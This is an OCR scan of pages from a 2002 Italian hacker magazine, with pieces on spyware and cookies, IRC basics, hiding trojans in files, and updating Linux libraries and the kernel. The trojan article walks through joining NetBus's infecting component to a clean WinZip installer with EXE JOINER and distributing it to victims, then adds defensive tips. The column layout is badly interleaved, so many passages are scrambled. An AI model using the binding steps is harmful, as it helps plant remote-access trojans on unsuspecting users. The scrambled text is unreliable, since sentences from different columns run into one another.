in rete l'adware scarica i banner registrato nel file di registro di Win-
pubblicitari che verranno poi visua- dows (quello che inserite durante re la casella di posta intasata da
lizzati a rotazione nella finestra del l'installazione) insieme, ovviamen- tonnellate di spam (di cui alcune,
programma che li ha richiamati; e te, ai dati della vostra connessione provenienti da siti mai visitati, vi
fin qui tutto bene. In questo caso il (indirizzo IP ma anche provider e chiamano persino per nome) o
passaggio di dati è praticamente località in cui siete) e persino la vo- strani pop-up che compaiono du-
unidirezionale: dal server al pro- stra e-mail. Le informazioni rante la navigazione, magari con
gramma. che uno spyware banner proprio in Italiano o ri-
può ricavare so- guardanti il vostro hobby preferi-
no quindi innu- to. Infine occorre considerare che
>> ...il software inizia merevoli e spesso questi spyware, residenti in me-
a spiare vengono rivendu- moria, causano non pochi proble-
te a caro prezzo a mi originando conflitti con al-
Le aziende però cercano di sfrutta- terzi dalle azien- tri programmi e compro-
re il più possibile ciò di cui dispon- de che se ne im- mettendo la stabilità
gono, anche se questo implica una possessano. dell'intero sistema. Net-
violazione della privacy degli uten- Spaventati da tut- scape Navigator ad
ti. Perchè limitarsi a esporre ban- to ciò? La para- esempio si blocca pre-
ner a rotazione, quando è invece noia sta prenden- sentando errori nel mo-
possibile attuare campagne mirate do il sopravvento dulo Advert.dll, mentre
in base agli interessi degli utenti? in voi favorita da con Internet Explorer
Ecco che allora si è iniziato ad inse- questa atmosfera or- 5.01 avvengono degli er-
rire una sorta di "programma nel welliana da Grande Fratel- rori casuali che bloccano
programma" avente come unica lo? Non temete... Dopotutto il browser e l'unica solu-
funzione quella di spiare le perso- è abbastanza facile, sapen- zione è riavviare il siste-
ne, raccogliendo informazioni sul done leggere i sintomi, ca- ma (anche in questo caso
loro conto e inviandole a un appo- pire se uno spyware è pre- il fenomeno è causato dalla li-
sito server. Siamo perciò giunti ad sente sul vostro PC e allo stes- breria Advert.dll).
identificare il punto cruciale che di- so modo non è poi così difficile libe- I programmi contenenti spyware
stingue la tecnologia adware da rarsene. sono tantissimi (le liste di questi
quella spyware: nel primo caso la software sparse sui siti Web sono
comunicazione avviene solo in un innumerevoli ed è sufficiente cerca-
senso, e abbiamo un'esposizione di
>> Tanti i sintomi... re "spyware list" con un motore di
banner, mentre nel malaugurato ricerca per trovarne qualcuna) e tra
caso i cui invece la comunicazione e Se il vostro collegamento si è note- questi spiccano nomi quali CuteFTP,
la trasmissione di dati avvenga an- volmente rallentato dopo che avete FlashGet, Go!Zilla, Photocopier,
che dal programma al server (e installato un nuovo programmino o Babylon, iPhone e quasi tutti i più
quindi finisce con l'essere l'utente a se strani file continuano a tentare diffusi programmi di file-sharing.
mandare dati al server e non vice- di aprire una connessione senza Occorre però anche dire che talvol-
versa) siamo in presenza di uno che l'antivirus rilevi la presenza di ta solo alcune versioni meno recen-
spyware. In pratica queste "spie un trojan, molto probabilmente ti contengono spyware mentre nel-
software" possono trasmettere ogni uno spyware è già installato sul vo- le ultime release, magari sotto la
sorta di informazioni riguardanti i stro PC. Altri sintomi possono esse- pressione degli utenti, diverse case

21 | www.hackerjournal.it
18_21_HJ08_SPY 4-09-2002 11:04 Pagina 20

Difendersi dai "biscottini"


Il metodo più rapido per difendersi dai cookie è quello di non autorizzare il proprio
browser a scaricarli; tuttavia questo comporterebbe un utilizzo assai limitato dei ser-
vizi che la Rete offre poichè, ad esempio, è sempre uno di questi "biscottini" che per-
mette al server di identificare univocamente l'utente e quindi abilita l'accesso a zone
sicure e protette quali la casella e-mail on-line. Allo stesso modo, configurare il pro-
prio navigatore in modo che richieda sempre l'autorizzazione prima di scaricare un
cookie risulterebbe, a causa delle continue richieste, decisamente frustrante. Come
dicevamo, in molti casi questi piccoli files hanno comunque una scadenza oltre la
quale non vengono più considerati validi ma, non per questo, vengono rimossi dal

alla memoria mentre sulla destra


tre grossi pulsanti consentono di vi-
sualizzare i vari backup dei file so-
spetti effettuati nel corso delle di-
verse "pulizie" del sistema, di impo-
stare le opzioni (non moltissime) o
di avviare la scansione del sistema.
ro Dopo una prima fase di scansione
etti e al sicu e compare una schermata contenen-
e prot -awar
Sempr ’intuitivo Ad te i diversi files ritenuti pericolosi
all
grazie per la vostra privacy o per lo meno
sospetti e, a questo punto, è possi-
bile rimuovere tutti (o solo alcuni)
di quelli segnalati dal programma,
magari facendone prima una copia
di sicurezza con la funzione bac-
kup (fidarsi è bene, non fidarsi...).
>> E i cookie dove li
Sempre della stessa casa è anche mettiamo?
RefUpdate, un piccolo tool che,
hanno utenti ad utilizzare il software della
provveduto (almeno “le aziende della new Lavasoft sopra citato.
in parte) ad eliminarli o renderli economy sono disposte a In ogni caso nel grande Web sono
"meno nascosti". andati via via aumentando i tra-
tutto per un po’ di soldi” nelli di cui le ditte della new-eco-
>> ...ma non mancano nomy si servono per poter disporre
una volta installato, consente di ef- di quanti più dati personali degli
i rimedi! fettuare direttamente via Web l'ag- ignari utenti... Chiunque può infatti
giornamento del file di definizione facilmente carpire molte informa-
Come dicevamo prima, eliminare di Ad-aware, permettendovi così di zioni del vostro computer semplice-
però questi software-spia non è poi essere protetti anche dai più recen- mente attraverso l'apertura una
oggi così difficile: esiste un pro- ti spyware. Una volta selezionato il pagina Web: versione del browser
gramma appositamente studiato server da cui volete scaricare gli e del sistema
per questo scopo. Ad-Aware, pro- aggiornamenti (e impostati even- operativo, im-
dotto dalla Lavasoft è stato creato tualmente dal menu Options i postazioni del
proprio per cercare e rimuovere parametri del proxy), dovrete monitor, indi-
programmi e file adware, pro- semplicemente premere Con- rizzo IP, ultima
grammi e file spyware, chiavi del nect e, una volta terminato il pagina visitata,
registro di configurazioni sospette e tutto, avviare la scansione di presenza di
cookie sospetti. Il suo utilizzo è de- Ad-aware aggiornato. eventuali plug-
cisamente intuitivo e i risultati sono Fino all'anno scorso esisteva an- in etc.... Tutti
straordinari. Una volta installato che OptOut, un altro program- questi dati, che
con pochi clic (la versione 5.8x è di ma avente la medesima funzio- a prima vista
poco inferiore ai 900Kb), Ad-aware ne di Ad-aware, ma il suo svi- potrebbero
è pronto per essere avviato. Sulla luppo si è arrestato e le copie sembrare privi
sinistra della schermata principale circolanti, oltre che essere ormai di interesse, di-
è possibile selezionare le periferi- obsolete, non sono nemmeno ventano in real-
che fisiche che si desidera far ana- più funzionanti tanto che lo stes- tà molto impor-
lizzare al programma, insieme ov- so Steve Gibson, autore per l'ap- tanti per tutte quelle
viamente al registro di Windows e punto di OptOut, invita i suoi aziende che sviluppano, ad

www.hackerjournal.it |20
18_21_HJ08_SPY 4-09-2002 11:04 Pagina 21

vostro PC e un'interessante alternativa alla procedura manuale (cioè eli-


minare singolarmente i cookie) può invece essere l'utilizzo di alcuni pro-
grammi (in particolare è da segnalare Cookie Eater anche se ne esisto-
no tanti altri più o meno avanzati dai nomi altrettanto invitanti come
>>
Cookie Kille, Cookie Monster...) che, attraverso piacevoli interfacce,
semplificano l'operazione di "pulizia" individuando automaticamente i
cookies. Infine occorre ricordare per dovere di cronaca che, rispetto
ad Explorer, browser come Opera ma, soprattutto, Netscape e Mozil-
la permettono un maggior controllo e una miglior personalizzazio-
ne del livello di protezione proprio per quanto riguarda i cookie.

do un
esempio, siti Web e per i quali si- Non ci soffer- c o -
gnifica molto sapere che la mag- meremo più di okie,
gioranza degli utenti usa Netscape tanto sul con- RefU un ad-
piuttosto che Explorer (mmm... al- tenuto; è pe- rapi pdate: il server
do p
meno lasciatemelo credere ;) o che rò evidente er m modo m "scopre"
file d a i
ha installato il plugin Macromedia come questo i def ntenere gliore e che un
inizi
Flash o meno. Il problema non sta cookie memo- one aggiorn più utente ha
di A- a
quindi soltanto nel genere di infor- rizzi la lingua impostata awa to il visitato il
mazioni che vengono fornite quan- come predefinita per questo sito; re sito della
to nel fatto stesso che vengono pertanto anche alle successive Lamborghi-
"carpite" senza che l'utente stesso aperture di questo sito, se il cookie ni e quello di
ne sia consapevole. non sarà ancora scaduto, l'italiano un fan-club di Montoya, è probabi-
sarà ancora la lingua di default. le che questi sia più attratto da un
>> Vittime (complici) di La situazione si complica però se i banner riguardante il mondo dei
cookie vengono memorizzati da motori piuttosto che dalla pubblici-
una pubblicità mirata uno script contenuto ad esempio in tà di un ristorante nel South-Dako-
un pop-up pubblicitario di un sito: i ta. Sfruttando i cookie che si accu-
Per quanto riguarda la navigazio- banner visualizzati nelle pagine mulano nella cache del browser, è
ne in Rete vera e propria, i browser Web dei portali non sono gestiti di- possibile perciò seguire i suoi vari
consentono una discreta protezione rettamente dal sito del portale, ma spostamenti da una pagina Web
(bug permettendo) poichè esistono vengono spediti dai potenti server all'altra, studiare le sue preferenze
solo determinati dati che un brow- delle compagnie pubblicitarie e e le sue abitudini e quindi, ad
ser può inviare ad un server e altri pertanto i banner visualizzati sui esempio, mostrare sulle pagine che
dati che può inviare il server al siti più disparati vengono in realtà richiede messaggi pubblicitari mi-
browser. Gli unici file che un server inviati dal medesimo ad-server. Ec- rati affinché la campagna abbia
Web può inviare al nostro computer co quindi che un cookie memoriz- più successo possibile...
sono i noti 'cookies', ovvero file di
testo (generalmente di piccole di-

LINKS
mensioni) che il browser memoriz- Adware e RefUpdate Cookie Eater - Elimina i cookie
za e conserva in una directory ap- www.lavasoft.nu www.dittotech.com/Products/Co-
posita (C:\Windows\Cookies per chi okieEater
usa ad esempio IE sul PC). Su un Cosa si può sapere sul vostro conto...
cookie generalmente non vengono www.gemal.dk/browserspy AnalogX CookieWall - Blocca i cookie
solitamente dati sensibili ne tanto- www.analogx.com
meno il numero della vostra carta Una rubrica del New York Times
di credito e, occorre sottolinearlo, i sulla privacy in Rete Cookie Monster - Elimina tutti i co-
cookie creati da un server non ven- www.nytimes.com/library/tech/refe- okie de
gono letti da altri server. Proviamo rence/index-privacy.html http://go.to/ampsoft
a vedere cosa contiene:
zato da una pagina di un dato por- Insomma: le trappole della rete so-
---@kmeleon.sourceforge[1].txt: tale potrebbe benissimo essere let- no tante ma è possibile salvaguar-
lang to da quella di un altro se entram- dare la propria privacy. Con un po'
it bi si appoggiano sul medesimo ad- di attenzione e qualche accorgi-
kmeleon.sourceforge.net/ server, riuscendo così a ricostruire il mento (leggete la licenza dei pro-
0 vostro "percorso" nel Web. A questo grammi che installate...) potrete
1825436032 punto si intuisce come le aziende giocare, lavorare e navigare con
29722983 che gestiscono la visualizzazione molta più tranquillità! K
3017797024 dei banner possano avere interes- lele - www.altos.tk
29502... se ad utilizzare i cookie: se leggen-

23 | www.hackerjournal.it
22_24_HJ08_IRC 4-09-2002 11:06 Pagina 22

pratica

UNA GUIDA PER MUOVERE I PRIMI PASSI SU IRC

Irc: un territorio da esplorare


Per il grande pubblico, la chat è un'attività che si può fare
da un sito, da un programma di messaggistica istantanea, come Icq, o persino col
cellulare. Per gli smanettoni autenitici, però, l'unica e vera chat è quella di Irc.

…Chat?? Ma co- Joinare: italianizzazione del

“ s’è? Ah si…no ho
sentito parlare di-
verse volte in TV op-
pure ho letto qualcosa sui giornali…”
? verbo inglese “to join” (unire,
unirsi). Il comando Join viene
usato per entrare in un canale.
“Joinare un canale” vuol quindi
Ecco, diciamo che molte persone tut- dire “entrare nel canale”.
t’oggi risponderebbero una frase
quantomeno simile se fosse loro do- “nick”), che lo identifica in maniera ine-
mandato cosa sia una chat e soprattut- quivocabile. Se l’utente A vuole mandare
to come funzioni. un messaggio all’utente B, questo mes-
La chat oramai è diventata uno stru- saggio non arriva direttamente da A a B,
mento di comunicazione talmente diffu- concetto che stava alla base del program-
so che vale la pena di spendere due pa- e in particolare ma talk, ma passa attraverso il server che
iù su Irc,
role per chiarire un concetto che, pro- Volete saperne di p ro browser riconosce il mittente ed il destinatario (tra-
ntate il vost
prio a causa della sua diffusione massi- sui canali italiani? u P mite il nick) e lo spedisce quindi all’utente
va, entrerà ben presto nel gergo comu- rc ita lia.n et finale.
su www.i
ne. comunicazione fra due All’interno del server inoltre possono esse-
Ma di si cosa si tratta? Si tratta di comu- utenti in ambito di rete. I primi riconosci- re create delle stanze contrassegnate da
nicazione, e più precisamente di comuni- menti vennero nel 1991 e nell’anno se- un nome specifico (#nomestanza) dove si
cazione attiva; navigando si può com- guente crebbe ulteriormente fino a toccare mette in atto la comunicazione multiutente
prare, raccogliere informazioni, visitare la soglia dei 5.000 utenti connessi con- a cui si accennava prima. Qualunque co-
siti professionali delle ditte più all’avan- temporaneamente, considerato all’epoca sa scritta nell’area “pubblica” viene letta
guardia come all’opposto la misera pa- il limite tecnicamente invalicabile della re- da tutti gli utenti collegati a quella stanza.
ginetta web dell’amico “sfigato” alle pri- te. Non molti anni dopo, nel 1999, EFnet,
ma armi con l’HTML, ma in tutti questi la più grande rete IRC, raggiunse gli oltre
I comandi di Irc
casi il risultato è sempre il medesimo: 50.000 utenti simultanei e a tutt’oggi con
bytes, dati, elettroni, cose inanimate. La l’aumento esponenziale dell’utilizzo di Fra i più utili comandi che si possono
differenza e la rivoluzione della chat, e di questa rete non si può predirre fin dove si impartire direttamente nella linea
IRC in particolare come capostipite, è potrà spingere questo valore. di comando troviamo:
proprio la diversità di ciò che riceviamo; Ma cosa offre IRC? Beh… si potrebbe scri- /nick nick | cambia il nick all’utente
comunicazione attiva, viva. Dall’altra vere un libro di 500 pagine per spiegare connesso
parte del doppino telefonico non trovia- cosa ha offerto a me, ma purtroppo l’uni- /server | nomeserver si connette ad
mo un server che passivamente ci invia i ca risposta logica alla domanda è: “pro- un server specifico o cambia la con-
suoi dati, ma una persona in carne ed vare”. Farsi nuovi amici, fare nuove cono- nessione attuale
ossa che ci invia i suoi pensieri…affasci- scenze, indipendentemente dall’aspetto fi- /join #nomecanale | si connette al
nante non trovate?? sico o dalla razza, dalla religione o dalla canale specifico
cultura, sviluppare comunità virtuali di /whois nick | cerca info sul nick spe-
persone che vivono nei posti più disparati cificato
>> Le origini al mondo, gestire progetti comuni, trovare /msg nick messaggio | manda un
conforto, idee, risoluzione di messaggio ad un determinato utente
Tanto per dare una collocazione tempora- problemi…beh…questo e molto altro è /query nick | apre una fine-
le all’argomento affrontato, diciamo subi- IRC stra di dialogo privata con l’utente
to che le origini di IRC si perdono indietro Come funziona in pratica IRC? Il concetto specificato (equivalente del doppio
nel tempo di circa 15 anni. Era infatti il tecnico è assai semplice: tutti i computer click sul nick dell’utente in mIRC)
1988 quando Oikarinem in Finlandia svi- sono connessi ad un server specifico ed /away messaggio | imposta lo stato
luppò la sua idea di chat ampliando da ogni utente ha un “nome assoluto”, non “assente”, specificando il motivo
una base single-user ad una multi-user il duplicabile all’interno della stessa rete (in scritto nel messaggio
classico programma talk utilizzato per la gergo nickname, o più semplicemente /exit | chiude mIRC

www.hackerjournal.it |22
22_24_HJ08_IRC 4-09-2002 11:06 Pagina 23

>>
C’è anche chi usa Irc per creare danni,
spedendo file infetti da virus e trojan.
DCC ignore; questa opzione serve per sta si riempirà di stanza da visitare…:D
ignorare automaticamente l’accettazione Via via vi capiterà di non riuscire ad en-
di files con estensioni particolari poten- trare nel canale che desiderate. Perché
zialmente rischiose quali per esempio gli accade questo? Ci sono molteplici ragio-
.exe, i .pif ed i .bat. Vi consiglio di attivar- ni possibili. Il canale potrebbe essere “a
la se non siete molto pratici di internet e invito”: i moderatori del canale hanno
di computer e soprattutto se non avete un
buon antivirus aggiornato. Usando IRC vi Takkare, takkato: dal-
U n a v o lt a
installato il
aspettiamo
ch e a v re te
vostro clien
sul canale #
sc a ri ca to e
t preferito,
vi
accorgerete che tra le migliaia di persone
interessanti con cui verrete a contatto ci
saranno anche coloro i quali usano que-
sta rete per creare danni spedendo files
? l’inglese to take, prendere. Un
canale si dice takkato quando è
stato rubato ai suoi legittimi
proprietari
sul server ir hackerjourn infetti da virus e trojan. Il mio consiglio
c.azzurra.o al,
rg. resta quindi sempre quello di non accet-
tare mai file da sconosciuti, in modo da
proteggersi il più possibile da spiacevoli Client per ogni gusto
>> Mettiamolo sorprese.
in pratica Configurato a dovere il client siamo fi- Se su Windows la stragrande mag-
nalmente pronti per addentrarci in IRC. gioranza degli utenti utilizza mIRC
Una volta premuto OK nella finestrella di (www.mirc.com) come client di chat,
Ma in pratica…come si fa?? Dopo tanta configurazione non mancherà altro che su Mac e Linux non c'è un preodmi-
teoria, vediamo quindi come fare a usa- connetterci al server per iniziare l’avven- nio assoluto. Per quanto riguarda
re IRC nella pratica. Essendo una rete tura. Ci sono due metodi per farlo: clic- Mac, probabilmente il client più dif-
formata da server ci serviremo di un pro- care sull’icona del fulmine in alto a sini- fuso è Ircle (www.ircle.com), per il
gramma client per potervi accedere. stra, oppure scrivere /server nomeserver. quale esistono numerosi set di script
mIRC () è esattamente ciò che fa al caso Prendo spunto da questo tipo di collega- già pronti (basta cercare Ircle su
nostro. Una volta scaricato ed istallato si mento per introdurre un ulteriore concet- versiontracker.com per tovarne sva-
dovrà configurare nella maniera ottimale to: i comandi in linea. Su mIRC sono a riati). Un programma più recente
per il suo corretto funzionamento. Nella decine e tutti iniziano col carattere spe- ma che si sta facendo largo è Snak
ciale /. I principali comandi sono elenca- (www.snak.com), meno
Q u e r a r e : anche in questo ti nel riquadro “i comandi di Irc”. completo ma forse più

? caso, una maldestra italianizza-


zione. Significa inviare una
Query a un utente, mandando-
gli un messaggio personale,
>> E adesso?
immediato e intui-
tivo. Entrambi
sono compati-
bili con i siste-
che non sarà visibile agli altri partecipan- Ok, mi sono connesso…e ora?? Ora fi- mi tradizio-
ti della stanza. nalmente s’inizia!!! Su IRC esistono mi- nali e con il
gliaia di stanze visualizzabili con il co- nuovo Mac OS
mando /list; non fatelo! A meno che non X. Chi preferi-
prima schermata delle opzioni (icona con abbiate una connessione superveloce la sce un client
cartella e martello) dovrete scegliere il mole di dati che ricevete da tale coman- rilasciato sotto
server a cui collegarvi, specificare il vo- do vi farà cadere dal server. Per iniziare vi licenza GPL può
stro nome e la vostra email (vi consiglio consiglio di tentare col canale della vo- invece rivolgersi a
di usare quella non ufficiale…non si sa stra città: provate con #siena, #firenze, ShadowIrc (www.shado-
mai…) e scegliere il vostro nickname. Ri- #genova, #palermo, tutti “joinabili” col wirc.com), che però non è
guardo alla lista dei server inserita su comando /join #nomechan… Nel mo- compatibile con il nuovo Mac OS X.
mIRC vi suggerisco di utilizzarne uno ita- mento in cui scrivo i canali #roma e Per quanto riguarda Linux, il client
liano (tin, tiscali…) per non avere proble- #milano non sono utilizzabili in quanto più famoso a linea di comando è
mi di rifiuto della connessione. Sfoglian- “takkati”. Potete provare con #roma1, probabilmente BitchX
do le altre opzioni vedrete che sono tutte #roma2…magari siete fortunati!!! (www.bitchx.org), completamente
voci molto intuitive e che, nella maggior Il metodo migliore per conoscere canali scriptabile e programmabile, anche
parte dei casi, non necessitano di essere resta comunque il passaparola: cercate se poco adatto ai novellini e ai de-
variate a meno che non si voglia una persone con i vostri interessi, chiedete lo- boli di cuore. Un client più semplice
personalizzazione specifica del client. ro se conoscono canali tematici o siti in- da utilizzare potrebbe essere XChat
Spenderò una nota solo a favore della ternet in cui si parla di ciò che vi incurio- (www.xchat.org), che ha un'interfac-
voce DCCFolders dove si trova la voce sisce e vedrete che ben presto la vostra li- cia grafica XFree86.

23| www.hackerjournal.it
22_24_HJ08_IRC 4-09-2002 11:06 Pagina 24

pratica

UNA GUIDA PER MUOVERE I PRIMI PASSI SU IRC


>>
Operatore: utente con po-
deciso di non permettere l’ingresso a
chiunque, ma solo a una determinata
cerchia di persone conosciute. In questo
caso, o riuscite a contattare un utente al-
l’interno del canale e farvi invitare (/invi-
>> Operatori e bot
te avete querato nick sbagliati.
In cima alla lista di ogni chan ci sono va-
ri utenti con la @ davanti al nick. Alcuni
? teri speciali all’interno del cana-
le.

che l’attività proceda sempre nel miglio-


te nickname #canale), oppure è bene di essi sono umani e sono gli operatori re dei modi. I BOT sono inanimati, sono
che rivolgiate le vostre ricerche altrove. Il che citavo prima, altri sono bot. Gli ope- gestiti dagli amministratori del canale
canale potrebbe poi essere “completo”: ratori sono dei super-utenti che hanno che li programmano al meglio. Non vi

In mIRC è possi- Alcuni server richiedono l’u- Nel menù a


bile loggare tut- so di un ident per permette- tendina DCC
te le attività re la connessione. In linea ignore pos-
svolte. Nel primo di massima i server IRCnet siamo sce-
menù a tendina non la gliere le
si sceglie fra le richie- estensioni
query, la stanza dono, dei files in-
pubblica o en- sceglie- desiderati
trambe, nei me- te voi (per esempio *.exe, *.bat, *.pif).
nù a spunta si decide lo stile e la di- se set- Se siete utenti alle prime armi vi
mensione dei files e nell’ultima linea tarla o conviene settarlo per non incorre-
si può scegliere il percorso preferito. meno. re in spiacevoli sorprese.

su alcuni chan è stabilito un numero funzione di controllo sul canale con ca- offendete se non vi rispondo perché
massimo di utenti all’interno che è già pacità di “kikkare” e “bannare” gli utenti semplicemente…non possono farlo!
stato raggiunto; riprovate e prima o poi Provate con qualche utente senza la @,
DCC: direct client connection.

?
entrerete! Il vostro nick potrebbe poi es- o con qualche nick che vedete chattare
sere stato bannato da un canale; può ca- Protocollo per scambio di dati in pubblico. Siate cortesi e nessuno vi
pitare che (in maniera automatica, oppu- fra due client. negherà mai un caloroso benvenuto al-
re per volere di un qualche operatore del l’interno della nostra comunità!
canale), dopo essere entrati veniate sbat- Questa breve carrellata all’interno di
tuti fuori; ciò è dato dalla visualizzazione indesiderati. Ancora una volta, questi IRC spero sia servita per darvi un’idea di
da parte del vostro client di un utente in- strani derivano dal nome inglese dei co- cosa sia questa rete, di cosa si possa fa-
desiderato oppure perché avete contrad- mandi a cui si riferiscono. Con il coman- re utilizzandola e di come iniziare a far-
detto le regole del canale. La soluzione do /kick, un operatore può espellere lo. Nei numeri successivi ci addentrere-

Ecco le opzioni per Finestra principale


il protocollo di invio di connessione: po-
di file. Consigliamo tete scegliere il net-
di non cliccare su work (IRCnet, EFnet,
autoget files, in Azzurranet…) ed il
modo da controlla- relativo server. È
re cosa vi arriva e meglio scegliere
chi lo manda. Sotto server italiani, per-
si scelgono le op- ché spesso quelli
zioni per la chat DCC; anche in questo ca- stranieri non permettono connessioni di ANulla di difficile da
so, meglio non settare in automatico per ip “fuori paese”. Nella seconda metà po- spiegare; date
evitare query non richieste a volte anche tete impostare il vostro nome ed email, un’occhiata e sce-
utilizzate per scopi non proprio amiche- meglio se non quella ufficiale, e decidere gliete quelle che vi
voli (…dccfucker…) il vostro nick. sembrano più utili.

migliore è contattare un operatore e temporaneamente un certo utente da un mo più nel cuore dell’argomento, ana-
chiedere informazioni e chiarimenti in canale, mentre con /ban può impedirgli lizzando in maniera molto tecnica la co-
merito. di rientrare (può “bandirlo” dal canale, municazione, come creare e gestire un
Bene, ora che siete dentro finalmente ini- appunto). canale, chi sono e cosa fanno gli opera-
ziate a “querare” (contattare direttamen- BOT è una contrazione della parola ro- tori, i comandi del server, cos’è e come
te, in modo personale) i presenti e vede- bot; in pratica, sono dei programmi che si configura una IPv6, la shell, la confi-
te un po’ come va il vostro primo incon- compiono azioni su un canale Irc. Sono gurazione dei BOT, i server IRC ed infine
tro. Se vi capita che nessuno vi risponda montati su dei client perennemente con- le problematiche di sicurezza e l’IRCwar.
potreste essere capitati in un gruppo di nessi ad IRC e hanno funzioni di super- K
maleducati, ma di certo non è questa la utente, controllando che nel chan non
filosofia di IRC, oppure più probabilmen- succedano intoppi e facendo in modo CAT4R4TTA

www.hackerjournal.it
www.hackerjournal.it ||24
24
25_HJ08_EXE 4-09-2002 11:07 Pagina 25

SICUREZZA

COME I PIRATI INSERISCONO TROJAN IN UN FILE QUALUNQUE

Come ti infetto il file...


Siete proprio sicuri che dietro a quell'innocuo salva schermo con le signorine
simpatiche e svestite non si celasse un malizioso cavallo di troia?

M
olti sono convinti che è possibi- >> Incollare
le essere infettati solo con la
Posta Elettronica o con l'inseri- insieme due file
mento di qualche CD nel pro-
prio computer di cui non si co- Una tecnica utilizzata dai pi-
nosce la provenienza. Costoro sottova- rati è quella di incollare il sente solo
lutano la possibilità di essere infet- "file virus .exe" ad un in siti che
tati con altri metodi tanto semplici software pulito, il tutto con non si pos-
quanto efficaci. l'utilizzo di software adatti allo sono ritenere
Questi altri metodi di diffusione vengono scopo e con pochi clic del Mouse. affidabili, come
applicati da pirati che sostanzialmente Uno dei tanti software utilizzati potrebbe esse- minimo effettuate prima una scansione con
hanno il desiderio di impossessarsi del re EXE JOINER oppure JOINER BY BLADE, un buon antivirus aggiornato, e magari pro-
computer della vittima, per esempio instal- che utilizza lo stesso principio ma funziona vatelo su un computer che non contenga dati
lando sul computer della vittima un caval- anche con altri tipi di files (jpg, bmp...). Crea importanti per il vostro lavoro o studio. Dopo
lo di Troia come Back Orifice, NetBus o un file che eseguirà in successione i 2 prece- l'installazione, fate una verifica con un
sub7. Tanto per fare un esempio, il softwa- denti (nel caso di una jpg e di un exe mostra programma specifico per la rilevazio-
re NetBus è diviso in due parti: Netbus.exe la jpg ed esegue l'exe). ne dei trojan e controllate sempre che sul
e Patch.exe, quest'ultimo è quello che infet- Il programma EXE JOINER è di una vostro computer non ci siano in esecuzione
ta il computer della vittima e naturalmente semplicità assurda, e questo fa sì che programmi server di cui non siete a cono-
deve essere eseguito nel computer di que- possa essere utilizzato da qualsiasi scenza. K
st'ultimo. Ma come è possibile infettare la perditempo che sappia accendere il com- Michele A.
vittima con il file Patch.exe? puter e lanciare un programma.
Basta cliccare su "Browse" Exe 1 path e cerca-
Alcuni strumenti re il file .exe pulito (ad esempio un program-
ma per comprimere file come WinZip.exe) e
anti trojan cliccare su "Browse" Exe 2 Path per cercare il
Spesso, un anti virus aggiornato file infetto da incollare al software pulito (ad
esempio Patch.exe del NetBus). In questo mo-
non è sufficiente a identificare con
do cliccando su JOIN il programmino unisce
certezza un cavallo di Troia. Per i due file in uno .exe. A questo punto basta
stare davvero tranquilli, conviene distribuire il software WinZip infettato per fre-
usare uno di questi: gare la vittima; questo può accadere anche
attraverso un piccolo sito costruito apposita-
mente. Quando vittima cliccherà sul file .exe,
Anti-Trojan insieme al software pulito installerà anche,
www.anti-trojan.net senza accorgersene, il file col virus.

SwatIt Trojan Scanner >> Difese alzate


www.lockdowncorp.com
Insomma, non basta stare attenti agli allegati
Trojan Remover delle mail, ma anche con quei programmi
www.simplysup.com scaricati da internet che apparentemente ci
n pro-
sembrano "puliti". Ecco perchè è importante
a re u n 'occhiata a u
Tiny Trojan Trap Basta d er capire
scaricare software solo da siti affidabi-
a co m e ExeJoiner p
www.tinysoftware.com gram m lamer
li, o fare una bella scansione con un
si a fa ci le per un
quan to alizioso
buon antivirus prima di eseguire l'installa-
u n p ro gramma m
Trojan Guarder inseri re arenza
zione. Se siete alla ricerca di materiale pre-
o a u n a ltro, dall'app
www.your-soft.com dentr
innocente.

25 | www.hackerjournal.it
26_27_hj08_linux 4-09-2002 11:10 Pagina 26

privacy

COME AGGIORNARE IL PROPRIO SISTEMA

Tieni in forma il tuo


N
Negli scorsi numeri abbiamo
visto come installare e aggior-
nare un programma. Capita a
volte che un certo programma
richieda delle versioni più ag-
giornate delle librerie, o che
necessiti di una certa versione del Ker-
pinguino
nel per poter funzionare. In questo arti-
colo vedremo come effettuare le opera- Librerie: Frammenti di softwa-
zioni necessarie ad aggiornare le libre-
rie e ricompilare il Kernel.

>> Aggiornare le librerie


I file delle librerie sono organizzati in
modo complesso, per cui a questi file
vengono affiancati dei collegamenti per
rendere più facile richiamarli. Questi
? re che svolgono funzioni specifi-
che e che vengono utilizzati da
svariati programmi, che ne condi-
vidono le funzionalità. Un esem-
collegamenti sono molto importanti, e pio di libreria sono le DLL di Windows.
quando aggiorniamo i file, dob-
Di solito la propria distribuzione forni- biamo aggiornare anche i colle-
sce già i pacchetti delle librerie, da in- gamenti. Solo alla fine, dopo esserci
stallare tramite il programma di gestio- accertati che l'opeerazione è andata a Se vogliamo sostituire questa libreria con la
ne pacchetti della distribuzione stessa. buon fine, possiamo eliminare il file versione 9.8.10, il cui file ha il nome
Quando però si è costretti a fare vecchio. "libc.so.9.8.10", facciamo così:
le cose da soli, bisogna fare molta Ecco un esempio dei collegamenti:
attenzione. In particolare, una modi- # ln -s -f libc.so.9.8.10 libc.so.9
fica maldestra al contenuto della cartel- libc.so -> libc.so.9
la "/lib/" potrebbe compromettere il libc.so.9 -> libc.9.8.7 Per creare il collegamento è stata necessaria
funzionamento dell'intero sistema. libc.so.9.8.7 l'opzione "-f", che permette di sovrascrivere il
collegamento preesistente. Infatti non è pos-
sibile eliminare prima il collegamento vec-
chio, dato che si corre il rischio di un blocco
di sistema.

libc.so -> libc.so.9


libc.so.9 -> libc.so.9.8.10
libc.so.9.8.7
libc.so.9.8.10

Per sicurezza, è meglio lasciare le libre-


rie vecchie perchè alcuni programmi
potrebbero necessitarne.
Quando una libreria subisce un aggiorna-
mento significativo, per cui i numeri delle
versioni sono molto differenti rispetto ai pre-
cedenti, conviene affiancarle invece che so-
stituirle.
Se vediamo l'esempio precedente, mettiamo
caso che la libreria da aggiornare sia arri-
vata alla versione 10.1.1, con ilfile
"libc.so.10.1.1", si capisce subito che il colle-
gamento "libc.so.9" non raggiunge questa
libreria.
In linea di massima, se tutto funziona a
dovere, è meglio lasciare le cose co-
me stanno, a meno che alcuni programmi
non richiedano una versione specifica di
"libc.so". Riagganciandosi all'esempio, dob-

26| www.hackerjournal.it
26_27_hj08_linux 4-09-2002 11:10 Pagina 27

>>
Certe volte per installare un programma o utilizzare una periferica è
necessario svolgere delle vere "operazioni a cuore aperto" sul proprio sistema.

biamo creare un collegamento simile a ti si trovano sul web (www.kernel.org). Il # make mrproper
"libc.so.9" solo denominato "libc.so.10" numero di versione è strutturato in 3 livelli: ;serve per eliminare i file e i collegamenti
x.y.z (es. linux-x.y.z.tar.gz), dove x è il valore vecchi che potrebbero intralciare la nostra
libc.so -> libc.so.9 principale e z quello meno importante. Pre- installazione.
